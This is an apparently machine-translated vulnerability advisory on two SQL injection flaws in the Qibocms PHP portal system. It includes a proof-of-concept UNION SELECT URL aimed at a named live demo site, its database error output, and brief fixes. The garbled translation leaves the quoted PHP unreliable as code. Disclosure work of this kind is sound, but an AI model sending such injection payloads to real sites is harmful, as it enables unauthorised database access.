Qibocms local portal system injection (demo test)

Qibocms local portal system injection (demo test)

Injection & another problem.

 

If (ereg ("^ ([-_ 0-9a-zA-Z] +) $", $ _ GET [jobs]) {// do not read the database if (is_file (dirname (_ FILE __). "/.. /inc/job/$ _ GET [jobs]. php ") {include (dirname (_ FILE __). "/.. /inc/job/$ _ GET [jobs]. php ") ;}} elseif (ereg (" ^ ([-_ 0-9a-zA-Z] +) $ ", $ _ GET ['job']) | ereg ("^ ([-_ 0-9a-zA-Z] +) $", $ _ POST ['job']) {// read database require (dirname (_ FILE __). "/". "global. php "); if (ereg (" ^ ([-_ 0-9a-zA-Z] +) $ ", $ job) & is_file (ROOT_PATH. "inc/job/$ job. php ") {include (ROOT_PATH. "inc/job/$ job. php ");}}

Include files.



Inc/job/ckreg. php
 

} Elseif ($ type = 'yzimg ') {if ($ db-> get_one ("SELECT * FROM {$ pre} yzimg WHERE $ SQL imgnum = '$ name' AND sid =' $ usr_sid '")) {die (" <font color = red> the verification code is entered correctly! </Font> ");} else {die ("  enter the correct Verification Code ");}

$ SQL is not initialized here. Combined with qibocms's Global Mechanism, you can directly control this variable to cause injection.


 

Demo test:



Http://life5.qibosoft.com/do/job.php? Job = ckreg & type = yzimg & SQL = 1 = 1 union select 1% 23



Database Connection error: SELECT * FROM life5_yzimg WHERE 1 = 1 union select 1 # imgnum = ''AND sid = '1wmqh6ce'



The used SELECT statements have a different number of columns

1222 enter the correct Verification Code




Second question

In wei/member/post. php

Elseif ($ action = "del") {$ rsdb = $ db-> get_one ("select B. *,. * FROM '{$ _ pre} content 'a LEFT join' {$ _ pre} content_1' B ON. id = B. id where. id = '$ id' "); if ($ rsdb [fid]! = $ FidDB [fid]) {showerr ("this topic has a problem");} if ($ rsdb [uid]! = $ Lfjuid &&! $ Web_admin) {showerr ("You are not authorized to operate ");} $ db-> query ("delete from '{$ _ pre} content 'where id =' $ id '"); $ db-> query ("delete from '{$ _ pre} content_1 'where id =' $ id '"); $ db-> query ("delete from '{$ _ pre} comments 'where id =' $ id'"); keyword_del ($ id, $ rsdb ['keyword']);

Keyword_del ($ id, $ rsdb ['keyword']);



Here is the warehouse, so we can introduce escape characters.
 

function keyword_del($id,$keyword){global $db,$_pre;if(!$keyword){return ;}$detail2=explode(" ",$keyword);foreach( $detail2 AS $key=>$value){if($value){$db->query("UPDATE `{$_pre}keyword` SET num=num-1 WHERE BINARY `keywords`='$value'");$_rs=$db->get_one("SELECT kid,num FROM `{$_pre}keyword` WHERE BINARY `keywords`='$value'");if($_rs[num]<1){$db->query("DELETE FROM `{$_pre}keyword` WHERE BINARY `keywords`='$value'");}$kid=$_rs[kid];$db->query("DELETE FROM `{$_pre}keywordid` WHERE `kid`='$kid' AND id='$id'");

We can see that the database is not filtered and then brought into the query.


 

First, write some special characters in the keywords and then import them to the database.


 

Then modify.



Click OK.


 

Warehouse picking causes injection.
 

 

 

Solution:

First initialize



The second outbound escape.